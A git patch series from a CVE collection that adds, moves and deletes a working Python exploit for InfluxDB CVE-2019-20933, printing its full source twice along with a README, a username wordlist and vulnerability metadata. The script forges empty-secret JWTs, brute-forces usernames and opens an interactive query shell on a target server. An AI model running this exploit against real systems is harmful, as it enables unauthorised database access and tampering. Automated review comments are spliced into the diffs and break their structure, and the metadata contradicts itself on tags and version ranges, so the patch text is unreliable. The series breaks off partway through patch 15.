From 49e030e9256dc58b63d61a617330929ea920cfb1 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:27:25 +0000 Subject: [PATCH 01/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From aa70c98f2891d377d26280ce82b1fe622213cefd Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:27:47 +0000 Subject: [PATCH 02/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 0f266e638fd376b9ce292fb2001835eb06174f04 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:28:04 +0000 Subject: [PATCH 03/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f8ab71fefa73e555cdaba5fd3b18d9a783ec14a6 Mon Sep 17 00:00:00 2001 
From: Zentung0628 Date: Tue, 14 Mar 2023 06:28:21 +0000 Subject: [PATCH 04/40] CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/confluence/2019/CVE-2019-20933/README.md | 16 ++ .../2019/CVE-2019-20933/__main__.py | 185 ++++++++++++++++++ .../2019/CVE-2019-20933/requirements.txt | 4 + cve/confluence/2019/CVE-2019-20933/users.txt | 7 + 4 files changed, 212 insertions(+) create mode 100644 cve/confluence/2019/CVE-2019-20933/README.md create mode 100644 cve/confluence/2019/CVE-2019-20933/__main__.py create mode 100644 cve/confluence/2019/CVE-2019-20933/requirements.txt create mode 100644 cve/confluence/2019/CVE-2019-20933/users.txt diff --git a/cve/confluence/2019/CVE-2019-20933/README.md b/cve/confluence/2019/CVE-2019-20933/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/README.md @@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/confluence/2019/CVE-2019-20933/__main__.py b/cve/confluence/2019/CVE-2019-20933/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/__main__.py 
@@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + 
# check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + 
response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/confluence/2019/CVE-2019-20933/requirements.txt b/cve/confluence/2019/CVE-2019-20933/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/confluence/2019/CVE-2019-20933/users.txt b/cve/confluence/2019/CVE-2019-20933/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From a6a64a806d71f4f34d1079e9a20733e0be0f2039 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:28:26 +0000 Subject: [PATCH 05/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1ec1aea543521673805b0771b5544fae119745e5 Mon Sep 17 00:00:00 2001 
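Review bot: `import urllib` by itself does not bind the `urllib.parse` submodule, so `urllib.parse.quote_plus` in `makeQuery` resolves only because `requests`, imported just after it, happens to load that submodule first; the import line should read `import urllib.parse`. The bare `except:` in `makeQuery` exists to cover PyJWT 1.x returning bytes from `jwt.encode`, but it also hides any other failure while building the headers; narrow it to `except TypeError:` (or drop the fallback once the PyJWT version is fixed in requirements.txt). `exit(1)` in `bruteforceUser` is the `site` module's interactive helper rather than `sys.exit(1)`, and the Italian comment `# Aggiungo un mese` should be in English, e.g. `# push the expiry roughly one month ahead`. The prompt text says `default: localhost` while the code substitutes `127.0.0.1`; one of the two should change so the message matches the behaviour.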
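Review bot: No version is pinned for any entry, which matters for `PyJWT` because the bytes-versus-str return of `jwt.encode` changed between the 1.x and 2.x lines and `__main__.py` carries a decode fallback for exactly that; pinning it (for example `PyJWT>=2,<3`) makes the behaviour reproducible. `urllib3` is listed although the script never imports it directly — it uses the stdlib `urllib.parse` — and it is already a transitive dependency of `requests`, so the line can go.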
From: Zentung0628 Date: Tue, 14 Mar 2023 07:05:33 +0000 Subject: [PATCH 06/40] CVE-2019-20933 yaml Signed-off-by: Zentung0628 --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/confluence/2019/yaml/CVE-2019-20933.yaml diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..ec29dcb4 --- /dev/null +++ b/cve/confluence/2019/yaml/CVE-2019-20933.yaml @@ -0,0 +1,19 @@ +id: 2019-20933 +source: +info: + name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 + severity: critical + description: | + 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 + scope-of-influence: +InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9 + cve-id: CVE-2019-20933 + cwe-id: CWE-78 + cnvd-id: CNVD-2020-03627 + kve-id: KVE-2019-1372 + tags: RCE,cve2019,任意文件读取 \ No newline at end of file -- Gitee From 878472f8ec702eff271cae4d928f5d47ff684c59 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 09:47:37 +0000 Subject: [PATCH 07/40] update cve/confluence/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml index ec29dcb4..05fc64d4 100644 --- a/cve/confluence/2019/yaml/CVE-2019-20933.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-20933.yaml 
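Review bot: The `scope-of-influence:` value `InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本` is placed at column 0 on the line after its key, where a YAML parser sees a stray root-level scalar instead of the key's value and rejects the document; put it on the key's line, `scope-of-influence: InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本`, or indent it under a block scalar like `description` does. The `tags` entry labels the issue `RCE` and `任意文件读取` (arbitrary file read) while the description and the `cvss-metrics` vector describe an authentication bypass; the tags should say so, e.g. `auth-bypass` (`认证绕过`). The version range in `scope-of-influence` (1.7.0 through 1.7.9) also disagrees with the description's "before 1.7.6"; reconcile it against the NVD entry cited under `reference`. `cwe-id: CWE-78` and `cvss-score: 9` are already corrected in the next commit (`@@ -1,19 +1,20 @@`), but the column-0 placement and the tags persist there and in the final deleted version (`@@ -1,20 +0,0 @@`).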
@@ -1,19 +1,20 @@ id: 2019-20933 -source: +source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 info: - name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 + name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 severity: critical description: | - 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9 + cvss-score: 9.8 cve-id: CVE-2019-20933 - cwe-id: CWE-78 - cnvd-id: CNVD-2020-03627 - kve-id: KVE-2019-1372 - tags: RCE,cve2019,任意文件读取 \ No newline at end of file + cwe-id: CWE-287 + cnvd-id: CNVD-2022-06547 + kve-id: None + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From b690fd16ce478188438386d8827d8b269b973f92 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 11:47:08 +0000 Subject: [PATCH 08/40] update cve/confluence/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml index 05fc64d4..172c737e 100644 --- a/cve/confluence/2019/yaml/CVE-2019-20933.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-20933.yaml 
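Review bot: `kve-id: None` is the YAML string `"None"`, not a null value, so any consumer comparing against an empty field will see a populated identifier; if the field is meant to be blank, write `kve-id:` with no value or `kve-id: ~`. The new `name:` value is a full-sentence description that largely restates `description:`; `name` appears intended as a short title (as in the previous version), so a one-line title such as `InfluxDB JWT 认证绕过 (CVE-2019-20933)` would keep the two fields distinct.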
@@ -1,4 +1,4 @@ -id: 2019-20933 +id: CVE-2019-20933 source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 info: name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 -- Gitee From ff1835804e2568f7f11ba5306dad454cff733536 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:32:07 +0000 Subject: [PATCH 09/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20InfluxDB?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/.keep diff --git a/cve/InfluxDB/.keep b/cve/InfluxDB/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 57dccce9d7739c63ad623bd19846ef6fbd6cfbfc Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:06 +0000 Subject: [PATCH 10/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/README.md | 16 -- .../2019/CVE-2019-20933/__main__.py | 185 ------------------ .../2019/CVE-2019-20933/requirements.txt | 4 - cve/confluence/2019/CVE-2019-20933/users.txt | 7 - 4 files changed, 212 deletions(-) delete mode 100644 cve/confluence/2019/CVE-2019-20933/README.md delete mode 100644 cve/confluence/2019/CVE-2019-20933/__main__.py delete mode 100644 cve/confluence/2019/CVE-2019-20933/requirements.txt delete mode 100644 cve/confluence/2019/CVE-2019-20933/users.txt diff --git a/cve/confluence/2019/CVE-2019-20933/README.md b/cve/confluence/2019/CVE-2019-20933/README.md deleted file mode 100644 index dad0665f..00000000 --- a/cve/confluence/2019/CVE-2019-20933/README.md +++ /dev/null 
@@ -1,16 +0,0 @@ -# InfluxDB Exploit CVE-2019-20933 - -Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). -Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. - -## Installation -``` -git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git -cd InfluxDB-Exploit-CVE-2019-20933 -pip install -r requirements.txt -``` - -## Usage -``` -python __main__.py -``` diff --git a/cve/confluence/2019/CVE-2019-20933/__main__.py b/cve/confluence/2019/CVE-2019-20933/__main__.py deleted file mode 100644 index e38d12f4..00000000 --- a/cve/confluence/2019/CVE-2019-20933/__main__.py +++ /dev/null 
@@ -1,185 +0,0 @@ -#!/bin/env python - -import json -import pathlib -import time -import urllib -import requests as requests -import jwt -from termcolor import colored - -def bruteforceUser(filename, host, port): - print() - print("Bruteforcing usernames ...") - with open(filename) as f: - for line in f: - line = line.replace("\n", "") - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 - # Generation JWT - payload = { - "username": line, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - if "error" in response.keys(): - if "signature is invalid" in response['error']: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: " + response['error'] + "", "red")) - exit(1) - if "user not found" in response['error']: - print("[{}] {}".format(colored("x", "red"), line)) - else: - print("[{}] {}".format(colored("v", "green"), line)) - print() - username = line - return username - - print(colored("ERROR: no valid username found !!!", "red")) - exit(1) - -def makeQuery(token, db, host, port, query): - try: - headers = { - 'Authorization': 'Bearer ' + token, - } - except: - token = token.decode("utf-8") - headers = { - 'Authorization': 'Bearer ' + token, - } - - # Send request - query = urllib.parse.quote_plus(query) - response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) - return response.text - -def exploit(): - # imput data - print() - try: - host = input("Host (default: localhost): ") - except KeyboardInterrupt: - return - - if host == "": - host = "127.0.0.1" - - try: - port = input("Port (default: 8086): ") - except KeyboardInterrupt: - return - if port == "": - port = 8086 - - try: - username = input("Username path to username file (default: users.txt): ") - except KeyboardInterrupt: - return - - if username == "": - username = "users.txt" - - 
# check if username is a valid file to start bruteforce - file = pathlib.Path(username) - if file.exists(): - username = bruteforceUser(username, host, port) - - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese - - # Generation JWT - payload = { - "username": username, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - #print("Token: {}".format(token)) - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - - if "results" in response.keys(): - print(colored("Host vulnerable !!!", "green")) - else: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: "+response['error']+"", "red")) - return - - # Get databases list - dblist = [db[0] for db in response['results'][0]['series'][0]['values']] - - while True: - print() - print("Databases:") - print() - for (i, db) in enumerate(dblist): - print("{}) {}".format(i + 1, db)) - - print() - print(".quit to exit") - - - try: - db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) - except KeyboardInterrupt: - print() - print("~ Bye!") - break - - try: - db = dblist[int(db) - 1] - except IndexError as e: - # Prompt again if database index if not in range - continue - except Exception as e: - # Check if database exists if its a string - if db.strip() == "": - continue - if db not in dblist: - print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") - continue - pass - - if db in ['.exit', '.quit', '.back']: - return - if db == "": - continue - - print() - print("Starting InfluxDB shell - .back to go back") - while True: - try: - query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) - except KeyboardInterrupt: - break - - if query.strip() == "": - continue - - if query in ['.exit', '.quit', '.back']: - break - - response = makeQuery(token, db, host, port, query) - 
response = json.loads(response) - print(json.dumps(response, indent=4, sort_keys=True)) - - -if __name__ == '__main__': - print(colored(""" - _____ __ _ _____ ____ ______ _ _ _ - |_ _| / _| | | __ \| _ \ | ____| | | (_) | - | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ - | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| - _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ - |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| - | | - |_| """, 'green')) - print(colored(" - using CVE-2019-20933", "yellow")) - - exploit() diff --git a/cve/confluence/2019/CVE-2019-20933/requirements.txt b/cve/confluence/2019/CVE-2019-20933/requirements.txt deleted file mode 100644 index a345330c..00000000 --- a/cve/confluence/2019/CVE-2019-20933/requirements.txt +++ /dev/null @@ -1,4 +0,0 @@ -urllib3 -requests -PyJWT -termcolor diff --git a/cve/confluence/2019/CVE-2019-20933/users.txt b/cve/confluence/2019/CVE-2019-20933/users.txt deleted file mode 100644 index 802b77da..00000000 --- a/cve/confluence/2019/CVE-2019-20933/users.txt +++ /dev/null @@ -1,7 +0,0 @@ -admin -user -root -database -db -influx -influxdb -- Gitee From ad9a309aa6f29ff6eefebdf5000bbda6089dbd5f Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:15 +0000 Subject: [PATCH 11/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/yaml/CVE-2019-20933.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 20 -------------------- 1 file changed, 20 deletions(-) delete mode 100644 cve/confluence/2019/yaml/CVE-2019-20933.yaml diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml deleted file mode 100644 index 172c737e..00000000 --- a/cve/confluence/2019/yaml/CVE-2019-20933.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: CVE-2019-20933 -source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 -info: - name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 - severity: critical - description: | - InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). - scope-of-influence: -InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-20933 - cwe-id: CWE-287 - cnvd-id: CNVD-2022-06547 - kve-id: None - tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From 3e54029d3295734bc1586d243e1fea927fc59b68 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:30 +0000 Subject: [PATCH 12/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9b67d43bf0cf4592624b9ac27c14a2008198703b Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:46 +0000 Subject: [PATCH 13/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/CVE-2019-20933/.keep b/cve/InfluxDB/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee 
From 84491d258440a36fca14cffe1b0c54734e3e5f92 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:56 +0000 Subject: [PATCH 14/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/.keep diff --git a/cve/InfluxDB/.keep b/cve/InfluxDB/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 8c226b539cdf5e836d72dfdd0cb9e007608ecb00 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:37:36 +0000 Subject: [PATCH 15/40] add CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/InfluxDB/CVE-2019-20933/README.md | 16 ++ cve/InfluxDB/CVE-2019-20933/__main__.py | 185 +++++++++++++++++++ cve/InfluxDB/CVE-2019-20933/requirements.txt | 4 + cve/InfluxDB/CVE-2019-20933/users.txt | 7 + 4 files changed, 212 insertions(+) create mode 100644 cve/InfluxDB/CVE-2019-20933/README.md create mode 100644 cve/InfluxDB/CVE-2019-20933/__main__.py create mode 100644 cve/InfluxDB/CVE-2019-20933/requirements.txt create mode 100644 cve/InfluxDB/CVE-2019-20933/users.txt diff --git a/cve/InfluxDB/CVE-2019-20933/README.md b/cve/InfluxDB/CVE-2019-20933/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/README.md 
@@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/InfluxDB/CVE-2019-20933/__main__.py b/cve/InfluxDB/CVE-2019-20933/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/__main__.py 
